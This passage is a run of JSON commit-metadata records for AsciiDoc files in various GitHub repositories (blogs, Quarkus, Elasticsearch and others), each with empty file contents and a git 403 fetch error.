2016-04-16-google-analytics-with-google-apps-script2.adoc","message":"Update 2016-04-16-google-analytics-with-google-apps-script2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script2.adoc","new_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ffff20b284b14234636d0fd9a56ea99ac29b82e2","subject":"y2b create post The Mind Blowing 33 Million Pixel Display...","message":"y2b create post The Mind Blowing 33 Million Pixel Display...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-26-The-Mind-Blowing-33-Million-Pixel-Display.adoc","new_file":"_posts\/2018-01-26-The-Mind-Blowing-33-Million-Pixel-Display.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c079d942e38e984397f3f797e2343c9a27ed692b","subject":"y2b create post GTA V Gameplay: First 10 Minutes!","message":"y2b create post GTA V Gameplay: First 10 Minutes!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-17-GTA-V-Gameplay-First-10-Minutes.adoc","new_file":"_posts\/2013-09-17-GTA-V-Gameplay-First-10-Minutes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52f7a2fde228af4471f734189a1ee3275474847e","subject":"Renamed '_posts\/2017-09-19-adding-about-page-to-hupbressio.adoc' to '_posts\/2017-09-22-adding-about-page-to-hupbressio.adoc'","message":"Renamed '_posts\/2017-09-19-adding-about-page-to-hupbressio.adoc' to '_posts\/2017-09-22-adding-about-page-to-hupbressio.adoc'","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-09-22-adding-about-page-to-hupbressio.adoc","new_file":"_posts\/2017-09-22-adding-about-page-to-hupbressio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97fe71a113310607c0ca52ccf61551b0cc753f46","subject":"Write the Maven configuration","message":"Write the Maven configuration\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/maven-config.adoc","new_file":"docs\/src\/main\/asciidoc\/maven-config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a6442fde588c6c872b2d33e98527cb92e11fc43f","subject":"Changes to developer manual","message":"Changes to developer manual\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1b65d8ae23880a16a0bf6625b3616c3a8d1416d7","subject":"Update 2015-07-27-How-Git-saved-our-project-or-nearly.adoc","message":"Update 2015-07-27-How-Git-saved-our-project-or-nearly.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2015-07-27-How-Git-saved-our-project-or-nearly.adoc","new_file":"_posts\/2015-07-27-How-Git-saved-our-project-or-nearly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"755afd108abdfb03f5c324dfd16148df8da6075c","subject":"the folder for NukeSped IoCs added (for the VB2018 paper)","message":"the folder for NukeSped IoCs added (for the VB2018 paper)\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"nukesped_lazarus\/README.adoc","new_file":"nukesped_lazarus\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"51f53a2c9f0ba37ee0cab63d7d3683e4861dd0f8","subject":"Update 2015-06-06-Test.adoc","message":"Update 2015-06-06-Test.adoc","repos":"OlgaMaciaszek\/olgamaciaszek.github.io,OlgaMaciaszek\/olgamaciaszek.github.io,OlgaMaciaszek\/olgamaciaszek.github.io","old_file":"_posts\/2015-06-06-Test.adoc","new_file":"_posts\/2015-06-06-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OlgaMaciaszek\/olgamaciaszek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"824f6a1fe2c1739516c423465bdd9db0e91c326a","subject":"Update 2017-03-02-test.adoc","message":"Update 2017-03-02-test.adoc","repos":"thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io","old_file":"_posts\/2017-03-02-test.adoc","new_file":"_posts\/2017-03-02-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomaszahr\/thomaszahr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9905ea190ad07eb2a0279cac31ebd0f2f0ba6f1c","subject":"Update 2019-05-09-Summer-19-Release-Developers-Perspective.adoc","message":"Update 2019-05-09-Summer-19-Release-Developers-Perspective.adoc","repos":"arshakian\/arshakian.github.io,arshakian\/arshakian.github.io,arshakian\/arshakian.github.io","old_file":"_posts\/2019-05-09-Summer-19-Release-Developers-Perspective.adoc","new_file":"_posts\/2019-05-09-Summer-19-Release-Developers-Perspective.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arshakian\/arshakian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2747afc461c251b84c44bcd371e4bfb8f4308d37","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"gastaldi\/demo-ang2,gastaldi\/demo-ang2,gastaldi\/demo-ang2,gastaldi\/demo-ang2,gastaldi\/demo-ang2","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gastaldi\/demo-ang2.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"fb9d9b3d9c7434b153ef812ac59c27c383b4da8f","subject":"Revert \"Try deleting README.asciidoc to force GitHub to re-generate the initial page\"","message":"Revert \"Try deleting README.asciidoc to force GitHub to re-generate the initial page\"\n\nThis reverts commit a2d40593436bf093e3cb2afe4a5b4143905d99d1.\n","repos":"thisco-de\/nanomsg,smithed\/nanomsg,kaostao\/nanomsg,JackDunaway\/featherweight-nanomsg,wfxiang08\/nanomsg,pakozm\/nanomsg,pakozm\/nanomsg,ttyangf\/nanomsg,krafczyk\/nanomsg,krafczyk\/nanomsg,potatogim\/nanomsg,nirs\/nanomsg,smithed\/nanomsg,simplestbest\/nanomsg,thisco-de\/nanomsg,kaostao\/nanomsg,JackDunaway\/featherweight-nanomsg,ttyangf\/nanomsg,yan97ao\/nanomsg,smithed\/nanomsg,modulexcite\/nanomsg,wfxiang08\/nanomsg,wirebirdlabs\/featherweight-nanomsg,cosin2008\/nanomsg.NET,zerotacg\/nanomsg,TTimo\/nanomsg,modulexcite\/nanomsg,cosin2008\/nanomsg.NET,reqshark\/nanomsg,snikulov\/nanomsg,linearregression\/nanomsg,ttyangf\/nanomsg,modulexcite\/nanomsg,featherweight\/ftw-kernel-nanomsg,gdamore\/mamomsg,reqshark\/nanomsg,wirebirdlabs\/featherweight-nanomsg,imp\/nanomsg,linearregression\/nanomsg,zerotacg\/nanomsg,kaostao\/nanomsg,tempbottle\/nanomsg,kaostao\/nanomsg,gdamore\/mamomsg,JackDunaway\/featherweight-nanomsg,zerotacg\/nanomsg,imp\/nanomsg,pch957\/nanomsg,simplestbest\/nanomsg,pch957\/nanomsg,tempbottle\/nanomsg,TTimo\/nanomsg,simplestbest\/nanomsg,hyperfact\/nanomsg,wfxiang08\/nanomsg,hyperfact\/nanomsg,wirebirdlabs\/featherweight-nanomsg,featherweight\/ftw-kernel-nanomsg,TTimo\/nanomsg,nirs\/nanomsg,pakozm\/nanomsg,ttyangf\/nanomsg,cosin2008\/nanomsg.NET,TTimo\/nanomsg,snikulov\/nanomsg,gdamore\/mamomsg,potatogim\/nanomsg,linearregression\/nanomsg,tempbottle\/nanomsg,pch957\/nanomsg,hyperfact\/nanomsg,yan97ao\/nanomsg,smithed\/nanomsg,reqshark\/nanomsg,krafczyk\/nanomsg,yan97ao\/nanomsg,nirs\/nanomsg,imp\/nanomsg,potatogim\/nanomsg","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/featherweight\/ftw-kernel-nanomsg.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c684ff27b42fce1660f57735a1bba4387b956d71","subject":"Update 2016-12-2-3-D.adoc","message":"Update 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-D.adoc","new_file":"_posts\/2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbf8eed1cf5c4e023e7fef1b864cdc9a29b3177c","subject":"y2b create post iPhone 7 - Sneak Peek","message":"y2b create post iPhone 7 - Sneak Peek","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-24-iPhone-7--Sneak-Peek.adoc","new_file":"_posts\/2016-07-24-iPhone-7--Sneak-Peek.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1fc2a6e33c5361960588799c592de179554e424","subject":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","message":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09584b6a09b45d1af7012e841cde942aaf011f77","subject":"Update 2015-12-29-Starting-the-personal-blog-using-hubpress.adoc","message":"Update 2015-12-29-Starting-the-personal-blog-using-hubpress.adoc","repos":"alexandrev\/alexandrev.github.io,alexandrev\/alexandrev.github.io,alexandrev\/alexandrev.github.io","old_file":"_posts\/2015-12-29-Starting-the-personal-blog-using-hubpress.adoc","new_file":"_posts\/2015-12-29-Starting-the-personal-blog-using-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alexandrev\/alexandrev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65e827da828ed0b96c4cd2382797307a96244c2e","subject":"Add manpage","message":"Add manpage\n","repos":"vasi\/pixz,cicku\/pixz,wookietreiber\/pixz,cicku\/pixz,vasi\/pixz,wookietreiber\/pixz","old_file":"pixz.1.asciidoc","new_file":"pixz.1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vasi\/pixz.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d299592c9de85cb530ac55e6962eef01252c1d11","subject":"Docs: clean up incorrect path in certgen output in the SSL docs","message":"Docs: clean up incorrect path in certgen output in the SSL docs\n\nOriginal commit: elastic\/x-pack-elasticsearch@0d2102094cf297b5e740b4495084878b6654bd36\n","repos":"nknize\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,vroyer\/elassandra,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,nknize\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,uschindler\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/en\/security\/securing-communications\/setting-up-ssl.asciidoc","new_file":"docs\/en\/security\/securing-communications\/setting-up-ssl.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3135206bbc99a6ab98bb206fe8ddc5f243d0b11d","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"849bacc5aed408c057bfcdab77fa54e33a79e60d","subject":"Adding release notes for release of revapi revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_maven_plugin revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml","message":"Adding release notes for release of revapi revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_maven_plugin revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210113-bugfix.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210113-bugfix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"15378d2949229658bba643164a56094ee5fd4392","subject":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","message":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53732e0514f58aa287f44d89151d6d6a18d41aaf","subject":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","message":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"418fe200a141b815ccccdb676e6ef903a729131c","subject":"Update 2017-03-15-E-Gt-showing-Nothing-to-fetch.adoc","message":"Update 2017-03-15-E-Gt-showing-Nothing-to-fetch.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-15-E-Gt-showing-Nothing-to-fetch.adoc","new_file":"_posts\/2017-03-15-E-Gt-showing-Nothing-to-fetch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f1354f76a474e55a08f9bc19f72318fbb183891","subject":"Create 2018-03-19-google-cloud-computing-deploy.adoc","message":"Create 2018-03-19-google-cloud-computing-deploy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-19-google-cloud-computing-deploy.adoc","new_file":"_posts\/2018-03-19-google-cloud-computing-deploy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c952188f631a6af908d20c0a7fce288481f59920","subject":"Update 2016-12-14-IEEE-Compute-Edition-3-Awaiting-its-Launch.adoc","message":"Update 2016-12-14-IEEE-Compute-Edition-3-Awaiting-its-Launch.adoc","repos":"IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog","old_file":"_posts\/2016-12-14-IEEE-Compute-Edition-3-Awaiting-its-Launch.adoc","new_file":"_posts\/2016-12-14-IEEE-Compute-Edition-3-Awaiting-its-Launch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IEEECompute\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"977a9f5e41ba9fd3234fd4bbf239be639647cbad","subject":"Update 2017-01-13-vue.adoc","message":"Update 2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fc9a4283d5a611f83d43dbe4b49ec9d10282676","subject":"Update 2013-02-20-Code-Story-2013-la-phase-de-selection.adoc","message":"Update 2013-02-20-Code-Story-2013-la-phase-de-selection.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2013-02-20-Code-Story-2013-la-phase-de-selection.adoc","new_file":"_posts\/2013-02-20-Code-Story-2013-la-phase-de-selection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"540fd679117823ad2c310fa18003b6d69f719a29","subject":"Esempi presentati in S-1D","message":"Esempi presentati in S-1D","repos":"gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc","old_file":"scrittura_ts_asciidoc.adoc","new_file":"scrittura_ts_asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gionatamassibenincasa\/scrittura_con_asciidoc.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"a95f540427429ed2762f834409e3cbceb79a32b1","subject":"y2b create post iPhone 6 Sapphire vs Arrow (feat. Joe Rogan)","message":"y2b create post iPhone 6 Sapphire vs Arrow (feat. Joe Rogan)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-07-18-iPhone-6-Sapphire-vs-Arrow-feat-Joe-Rogan.adoc","new_file":"_posts\/2014-07-18-iPhone-6-Sapphire-vs-Arrow-feat-Joe-Rogan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b2df1d47126912bdb62123a6b5a2feb926ffe90","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4ead88e123b81dc50a2264f0b105e54dccf581f","subject":"Updated goals [skip ci]","message":"Updated goals [skip ci]\n","repos":"sk413025\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv","old_file":"docs\/goals.adoc","new_file":"docs\/goals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"42c336df1fb7cab0245b53a98bf4a63d30cbaad8","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"556c1c1802186035495fe7485b61d2541263debe","subject":"Update 2017-03-25-New-Study-Reveals-Lungs-Play-A-Key-Role-In-Blood-Production.adoc","message":"Update 2017-03-25-New-Study-Reveals-Lungs-Play-A-Key-Role-In-Blood-Production.adoc","repos":"alchemistcookbook\/alchemistcookbook.github.io,alchemistcookbook\/alchemistcookbook.github.io,alchemistcookbook\/alchemistcookbook.github.io,alchemistcookbook\/alchemistcookbook.github.io","old_file":"_posts\/2017-03-25-New-Study-Reveals-Lungs-Play-A-Key-Role-In-Blood-Production.adoc","new_file":"_posts\/2017-03-25-New-Study-Reveals-Lungs-Play-A-Key-Role-In-Blood-Production.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alchemistcookbook\/alchemistcookbook.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b3ec91f555c9d5d7dc9f41fc6880f81c485087b","subject":"Simpl Papyrus and updt auto install","message":"Simpl Papyrus and updt auto install\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8277ccca73aeddf1de2d2736a43d116fdaaab13e","subject":"Summarized Papyrus install","message":"Summarized Papyrus install\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a7bf48501c31c241c4a05654b46a41d38669eb9","subject":"Update 2015-09-20-Flask-learning.adoc","message":"Update 2015-09-20-Flask-learning.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Flask-learning.adoc","new_file":"_posts\/2015-09-20-Flask-learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f171897749fc9f396a0459271e3f2e4f78acab6f","subject":"Add docs for carvel debug configs","message":"Add docs for carvel debug configs\n","repos":"jvalkeal\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,jvalkeal\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow","old_file":"src\/carvel\/docs\/debug.adoc","new_file":"src\/carvel\/docs\/debug.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jvalkeal\/spring-cloud-data.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0872a6ea39e8d43979234b3c586bf5a33550eef0","subject":"removes TermsLookup changes as it was used internally","message":"removes TermsLookup changes as it was used internally\n","repos":"kaneshin\/elasticsearch,jimczi\/elasticsearch,zkidkid\/elasticsearch,F0lha\/elasticsearch,trangvh\/elasticsearch,kalburgimanjunath\/elasticsearch,i-am-Nathan\/elasticsearch,mikemccand\/elasticsearch,rajanm\/elasticsearch,cnfire\/elasticsearch-1,sneivandt\/elasticsearch,JervyShi\/elasticsearch,onegambler\/elasticsearch,trangvh\/elasticsearch,pozhidaevak\/elasticsearch,JackyMai\/elasticsearch,socialrank\/elasticsearch,maddin2016\/elasticsearch,Rygbee\/elasticsearch,kaneshin\/elasticsearch,Stacey-Gammon\/elasticsearch,episerver\/elasticsearch,AndreKR\/elasticsearch,obourgain\/elasticsearch,andrestc\/elasticsearch,ZTE-PaaS\/elasticsearch,xingguang2013\/elasticsearch,Rygbee\/elasticsearch,sneivandt\/elasticsearch,scorpionvicky\/elasticsearch,ESamir\/elasticsearch,mortonsykes\/elasticsearch,strapdata\/elassandra,bawse\/elasticsearch,fernandozhu\/elasticsearch,lmtwga\/elasticsearch,mjason3\/elasticsearch,kaneshin\/elasticsearch,YosuaMichael\/elasticsearch,diendt\/elasticsearch,andrestc\/elasticsearch